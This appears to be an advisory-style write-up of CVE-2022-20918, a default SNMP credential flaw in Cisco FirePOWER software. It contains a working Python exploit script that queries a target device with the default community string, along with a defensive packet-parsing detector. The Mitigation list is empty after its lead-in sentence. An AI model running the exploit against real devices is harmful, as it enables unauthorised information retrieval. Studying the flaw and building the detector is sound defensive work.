A critical security vulnerability (CVE-2022-20918) has been discovered that impacts Cisco's FirePOWER Software for Adaptive Security Appliance (ASA) FirePOWER module, Cisco Firepower Management Center (FMC) Software, and Cisco Next-Generation Intrusion Prevention System (NGIPS) Software. This vulnerability allows an unauthenticated, remote attacker to perform an SNMP GET request using a default credential, potentially leading to unauthorized retrieval of sensitive information from an affected device.

Exploit Details

The vulnerability is due to the presence of a default credential for SNMP version 1 (SNMPv1) and SNMP version 2 (SNMPv2) in the affected software. An attacker could exploit this vulnerability by sending an SNMPv1 or SNMPv2 GET request to an affected device. A successful exploit could allow the attacker to retrieve sensitive information from the device using the default credential. However, this attack will only be successful if SNMP is configured on the affected device, and the attacker can only perform SNMP GET requests; write access using SNMP is not allowed.

Code Snippet

In Python, an attacker can send an SNMP GET request with the following code to exploit the vulnerability:

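from pysnmp.hlapi import (
    CommunityData, ContextData, ObjectIdentity, ObjectType,
    SnmpEngine, UdpTransportTarget, getCmd,
)

# Placeholders; see the note below the code.
community_data = "default_community_string"
target_ip = "target_device_ip"
# sysDescr.0: a GET needs the full instance OID, including the trailing .0
OID_sysDescr = "1.3.6.1.2.1.1.1.0"

def get_snmp_data(community, oid, ip):
    # mpModel=1 selects SNMPv2c (mpModel=0 would select SNMPv1)
    errorIndication, errorStatus, errorIndex, varBinds = next(
        getCmd(SnmpEngine(),
               CommunityData(community, mpModel=1),
               UdpTransportTarget((ip, 161)),
               ContextData(),
               ObjectType(ObjectIdentity(oid)))
    )

    if errorIndication:
        # Transport-level or engine-level failure (timeout, unreachable host, ...)
        print(errorIndication)
    elif errorStatus:
        # The agent answered with an SNMP error PDU
        print("Error: %s at index %s" % (errorStatus.prettyPrint(), errorIndex))
    else:
        for varBind in varBinds:
            # Each varBind is an (OID, value) pair
            print("SNMP Data: %s" % " = ".join(x.prettyPrint() for x in varBind))

get_snmp_data(community_data, OID_sysDescr, target_ip)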

Note: Replace "default_community_string" and "target_device_ip" in the code with the actual default community string and the IP address of the target device.
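
For defenders, the request described above is easy to recognise on the wire. The following added example (not part of the original write-up or of any Cisco tooling) decodes the BER header of UDP/161 payloads and flags SNMPv1/v2c read requests from sources outside an allow-list; the allow-listed address, the sample packet and its community string are constructed for illustration.

```python
import ipaddress

# Assumption: the only hosts allowed to poll SNMP (constructed documentation address).
ALLOWED_POLLERS = [ipaddress.ip_network("192.0.2.10/32")]
VERSIONS = {0: "v1", 1: "v2c"}  # community-based SNMP; v3 is laid out differently
READ_PDUS = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA5: "GetBulkRequest"}

# Constructed sample: SNMPv2c GetRequest for sysDescr.0, community "example-ro".
SAMPLE_GET = bytes.fromhex(
    "302a020101040a6578616d706c652d726fa019020101020100020100"
    "300e300c06082b060102010101000500")

def read_tlv(buf, pos):
    """Decode one BER TLV at pos and return (tag, value, next_pos)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:  # long-form length: low 7 bits give the byte count
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("truncated TLV")
    return tag, buf[pos:pos + length], pos + length

def parse_snmp_header(payload):
    """Return (version, pdu_tag) of an SNMPv1/v2c message, or None."""
    try:
        tag, body, _ = read_tlv(payload, 0)          # outer SEQUENCE
        vtag, ver, pos = read_tlv(body, 0)           # INTEGER version
        ctag, _community, pos = read_tlv(body, pos)  # OCTET STRING, never logged
        version = VERSIONS.get(int.from_bytes(ver, "big"))
        if (tag, vtag, ctag) != (0x30, 0x02, 0x04) or version is None:
            return None
        return version, body[pos]                    # first byte of the PDU is its tag
    except (IndexError, ValueError):
        return None

def flag_requests(packets):
    """packets: (src_ip, udp_payload) pairs seen on UDP/161. Returns findings."""
    findings = []
    for src, payload in packets:
        hdr = parse_snmp_header(payload)
        allowed = any(ipaddress.ip_address(src) in net for net in ALLOWED_POLLERS)
        if hdr and hdr[1] in READ_PDUS and not allowed:
            findings.append((src, hdr[0], READ_PDUS[hdr[1]]))
    return findings

if __name__ == "__main__":
    print(flag_requests([("198.51.100.7", SAMPLE_GET), ("192.0.2.10", SAMPLE_GET)]))
```

The community string is parsed but deliberately left out of the findings so that credentials do not end up in alert logs.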

Original References

1. Cisco Advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snmp-MPbZ5W8M
2. CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2022-20918

Mitigation

Cisco has released software updates to address this vulnerability in affected products. It is highly recommended that users apply these updates as soon as possible. Additionally, organizations can reduce the risk of exploitation by:

Conclusion

CVE-2022-20918 is a critical vulnerability affecting Cisco FirePOWER and NGIPS Software, posing a risk to sensitive information on affected devices. While the successful exploitation of this issue requires specific conditions, it's important for users to apply patches and implement additional security measures. Stay informed about security updates and be vigilant in maintaining and monitoring network security.

Timeline

Published on: 11/15/2022 21:15:00 UTC
Last modified on: 11/22/2022 00:48:00 UTC